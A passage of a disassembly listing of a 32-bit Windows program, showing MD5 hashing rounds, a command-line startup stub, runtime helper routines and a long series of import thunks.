mov edx, [edi+8]
call sub_40B801
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B801
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B801
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B801
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40B801
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B801
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B801
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B801
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40B801
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B801
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B801
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B80E
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40B80E
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B80E
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B80E
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B80E
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40B80E
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B80E
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B80E
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B80E
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40B80E
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B80E
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B80E
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B80E
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40B80E
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B80E
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B80E
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B815
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40B815
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B815
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B815
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B815
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40B815
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B815
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B815
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B815
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40B815
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B815
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B815
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40B815
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40B815
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40B815
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40B815
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, dword_446AF4
add [edi], eax
mov eax, dword_446AF8
add [edi+4], eax
mov eax, dword_446AFC
add [edi+8], eax
mov eax, dword_446B00
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_40B845 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C090 proc near ; CODE XREF: sub_4096E4+CAD�p
var_1C = dword ptr -1Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
sub esp, 1Ch
fnstcw [ebp+var_2]
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [esp+1Ch+var_1C]
mov eax, [esp+1Ch+var_1C]
fldcw [ebp+var_2]
leave
retn
sub_40C090 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C0B4 proc near ; CODE XREF: sub_401219+66�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_40C17C ; GetCommandLineA
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_40C0E8
push 22h
mov eax, edi
inc eax
push eax
call sub_40C6E0
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_40C103
mov edi, eax
inc edi
jmp short loc_40C0E0
; ---------------------------------------------------------------------------
loc_40C0DF: ; CODE XREF: sub_40C0B4+2F�j
inc edi
loc_40C0E0: ; CODE XREF: sub_40C0B4+29�j
cmp byte ptr [edi], 20h
jz short loc_40C0DF
jmp short loc_40C103
; ---------------------------------------------------------------------------
loc_40C0E7: ; CODE XREF: sub_40C0B4+3E�j
inc edi
loc_40C0E8: ; CODE XREF: sub_40C0B4+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_40C0F4
cmp eax, 20h
jnz short loc_40C0E7
loc_40C0F4: ; CODE XREF: sub_40C0B4+39�j
jmp short loc_40C0F7
; ---------------------------------------------------------------------------
loc_40C0F6: ; CODE XREF: sub_40C0B4+4D�j
inc edi
loc_40C0F7: ; CODE XREF: sub_40C0B4:loc_40C0F4�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_40C103
cmp eax, 20h
jz short loc_40C0F6
loc_40C103: ; CODE XREF: sub_40C0B4+24�j
; sub_40C0B4+31�j ...
push 0
call sub_40C1D0 ; GetModuleHandleA
push 1
push edi
push 0
push eax
call sub_40A4E2
pop edi
leave
retn
sub_40C0B4 endp
; =============== S U B R O U T I N E =======================================
sub_40C118 proc near ; CODE XREF: sub_40133E+8�p
; sub_402B12+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_40C119: ; CODE XREF: sub_40C118+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_40C119
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_40C118 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40C138 proc near ; CODE XREF: sub_401C5D+D4�p
; sub_405409+3E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_40C138 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C164 proc near ; CODE XREF: sub_40A4E2+35C�p
jmp ds:dword_447374
sub_40C164 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C170 proc near ; CODE XREF: sub_4063A9+111�p
jmp ds:dword_447378
sub_40C170 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C17C proc near ; CODE XREF: sub_40C0B4+5�p
jmp ds:dword_44737C
sub_40C17C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C188 proc near ; CODE XREF: sub_40133E+76�p
; sub_4014AA+9�p ...
jmp ds:dword_447380
sub_40C188 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C194 proc near ; CODE XREF: sub_401DE8:loc_401F1F�p
; sub_403010+212�p ...
jmp ds:dword_447384
sub_40C194 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C1A0 proc near ; CODE XREF: sub_401AC1+82�p
; sub_4096E4+639�p
jmp ds:dword_447388
sub_40C1A0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C1AC proc near ; CODE XREF: sub_40849F+E2�p
jmp ds:dword_44738C
sub_40C1AC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C1B8 proc near ; CODE XREF: sub_401AC1+E4�p
; sub_401DE8+2EE�p ...
jmp ds:dword_447390
sub_40C1B8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C1C4 proc near ; CODE XREF: sub_403BAD+143�p
; sub_4042A4+36�p ...
jmp ds:dword_447394
sub_40C1C4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C1D0 proc near ; CODE XREF: sub_4022D1+F�p
; sub_402639+FC�p ...
jmp ds:dword_447398
sub_40C1D0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C1DC proc near ; CODE XREF: sub_40133E+7C�p
; sub_401AC1+DF�p ...
jmp ds:dword_44739C
sub_40C1DC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C1E8 proc near ; CODE XREF: sub_4022D1+21�p
; sub_4022D1+36�p ...
jmp ds:dword_4473A0
sub_40C1E8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C1F4 proc near ; CODE XREF: sub_40133E+45�p
; sub_4014AA:loc_4014DD�p ...
jmp ds:dword_4473A4
sub_40C1F4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C200 proc near ; CODE XREF: sub_403AC7+36�p
; sub_4042A4+98�p ...
jmp ds:dword_4473A8
sub_40C200 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C20C proc near ; CODE XREF: sub_4056EE+10B�p
jmp ds:dword_4473AC
sub_40C20C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C218 proc near ; CODE XREF: sub_40181E:loc_40184F�p
; sub_401DE8:loc_40215F�p ...
jmp ds:dword_4473B0
sub_40C218 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C224 proc near ; CODE XREF: sub_4015C0+7E�p
; sub_401C5D+9D�p ...
jmp ds:dword_4473B4
sub_40C224 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C230 proc near ; CODE XREF: sub_4042A4+57�p
; sub_40A4E2+100�p
jmp ds:dword_4473B8
sub_40C230 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C23C proc near ; CODE XREF: sub_403AC7+83�p
jmp ds:dword_4473BC
sub_40C23C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C248 proc near ; CODE XREF: sub_4042A4+135�p
; sub_4096E4+A09�p ...
jmp ds:dword_4473C0
sub_40C248 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C254 proc near ; CODE XREF: sub_40352B+75�p
; sub_4037D7+59�p ...
jmp ds:dword_4473C4
sub_40C254 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C260 proc near ; CODE XREF: sub_4035A9+8E�p
; .text:00403A12�p
jmp ds:dword_4473C8
sub_40C260 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C26C proc near ; CODE XREF: sub_4035A9+5E�p
; .text:004039DB�p
jmp ds:dword_4473CC
sub_40C26C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C278 proc near ; CODE XREF: sub_402B12+1E3�p
jmp ds:dword_4473D0
sub_40C278 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C284 proc near ; CODE XREF: sub_4063A9+3F7�p
; sub_40A4E2+2DF�p
jmp ds:dword_4473D4
sub_40C284 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C290 proc near ; CODE XREF: sub_4063A9+32�p
jmp ds:dword_4473D8
sub_40C290 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C29C proc near ; CODE XREF: sub_402B12+1AA�p
jmp ds:dword_4473DC
sub_40C29C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C2A8 proc near ; CODE XREF: sub_403010+F8�p
jmp ds:dword_4473E0
sub_40C2A8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C2B4 proc near ; CODE XREF: sub_40133E+10�p
; sub_401719+8�p ...
jmp ds:dword_4473E4
sub_40C2B4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C2C0 proc near ; CODE XREF: sub_402B12+AD�p
jmp ds:dword_4473E8
sub_40C2C0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C2CC proc near ; CODE XREF: sub_401AC1+A7�p
; sub_405217+5A�p ...
jmp ds:dword_4473EC
sub_40C2CC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C2D8 proc near ; CODE XREF: sub_405217:loc_4052B4�p
; sub_4056EE+7A�p ...
jmp ds:dword_4473F0
sub_40C2D8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C2E4 proc near ; CODE XREF: sub_40A482+20�p
jmp ds:dword_4473F4
sub_40C2E4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C2F0 proc near ; CODE XREF: sub_405217+27�p
jmp ds:dword_4473F8
sub_40C2F0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C2FC proc near ; CODE XREF: sub_40133E+3E�p
; sub_401AC1+32�p ...
jmp ds:dword_4473FC
sub_40C2FC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C308 proc near ; CODE XREF: sub_40133E+71�p
; sub_401AC1+D4�p
jmp ds:dword_447400
sub_40C308 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C314 proc near ; CODE XREF: sub_40107A+13�p
jmp ds:dword_447404
sub_40C314 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C320 proc near ; CODE XREF: sub_402B12+4EF�p
; sub_4088C3+65�p
jmp ds:dword_447408
sub_40C320 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C32C proc near ; CODE XREF: sub_405368+64�p
; sub_4081B0+1D0�p ...
jmp ds:dword_44740C
sub_40C32C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C338 proc near ; CODE XREF: sub_40849F+10C�p
jmp ds:dword_447410
sub_40C338 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C344 proc near ; CODE XREF: sub_40A4E2+4EB�p
jmp ds:dword_447414
sub_40C344 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C350 proc near ; CODE XREF: sub_4063A9+320�p
; sub_4063A9+348�p
jmp ds:dword_447418
sub_40C350 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C35C proc near ; CODE XREF: sub_4063A9+50E�p
jmp ds:dword_44741C
sub_40C35C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C368 proc near ; CODE XREF: sub_40879D+14�p
jmp ds:dword_447420
sub_40C368 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C374 proc near ; CODE XREF: sub_4087BF+1E�p
jmp ds:dword_447424
sub_40C374 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C380 proc near ; CODE XREF: sub_403010+35�p
jmp ds:dword_447428
sub_40C380 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C38C proc near ; CODE XREF: sub_4063A9+275�p
jmp ds:dword_44742C
sub_40C38C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C398 proc near ; CODE XREF: sub_406966+47�p
jmp ds:dword_447430
sub_40C398 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C3A4 proc near ; CODE XREF: sub_403BAD+1A6�p
; sub_4042A4+2C5�p ...
jmp ds:dword_447434
sub_40C3A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C3B0 proc near ; CODE XREF: sub_403BAD+F9�p
; sub_40403C+11�p ...
jmp ds:dword_447438
sub_40C3B0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C3BC proc near ; CODE XREF: sub_401C5D+B5�p
; sub_405600+11�p ...
jmp ds:dword_44743C
sub_40C3BC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C3C8 proc near ; CODE XREF: sub_406966+1C�p
jmp ds:dword_447440
sub_40C3C8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C3D4 proc near ; CODE XREF: sub_408043+2C�p
; sub_40A4E2+77A�p
jmp ds:dword_447444
sub_40C3D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C3E0 proc near ; CODE XREF: sub_4042A4+1C5�p
; sub_4063A9+41E�p ...
jmp ds:dword_447448
sub_40C3E0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C3EC proc near ; CODE XREF: sub_4063A9+35F�p
; sub_406B40+8B�p ...
jmp ds:dword_447454
sub_40C3EC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C3F8 proc near ; CODE XREF: sub_408C98+A1�p
; sub_40ADF7+DB�p ...
jmp ds:dword_447458
sub_40C3F8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C404 proc near ; CODE XREF: sub_4063A9+300�p
jmp ds:dword_44745C
sub_40C404 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C410 proc near ; CODE XREF: sub_408BEF+26�p
; sub_408BEF+9B�p
jmp ds:dword_447460
sub_40C410 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C41C proc near ; CODE XREF: sub_408BEF+65�p
jmp ds:dword_447464
sub_40C41C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C428 proc near ; CODE XREF: sub_408C98+A3D�p
; sub_40ACD5+36�p ...
jmp ds:dword_447468
sub_40C428 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C434 proc near ; CODE XREF: sub_406E3F+7C�p
jmp ds:dword_44746C
sub_40C434 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C440 proc near ; CODE XREF: sub_40A4E2+459�p
jmp ds:dword_447470
sub_40C440 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C44C proc near ; CODE XREF: sub_40A4E2+47B�p
jmp ds:dword_447474
sub_40C44C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C458 proc near ; CODE XREF: sub_40A4E2+7A9�p
jmp ds:dword_447478
sub_40C458 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C464 proc near ; CODE XREF: sub_40A4E2+4A4�p
jmp ds:dword_44747C
sub_40C464 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C470 proc near ; CODE XREF: sub_40ADF7+367�p
; sub_40ADF7+42B�p ...
jmp ds:dword_447480
sub_40C470 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C47C proc near ; CODE XREF: sub_40A4E2+7E3�p
jmp ds:dword_447484
sub_40C47C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C488 proc near ; CODE XREF: sub_408C98+946�p
; sub_408C98+985�p ...
jmp ds:dword_447488
sub_40C488 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C494 proc near ; CODE XREF: sub_408C98+96A�p
; sub_408C98+99C�p ...
jmp ds:dword_44748C
sub_40C494 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
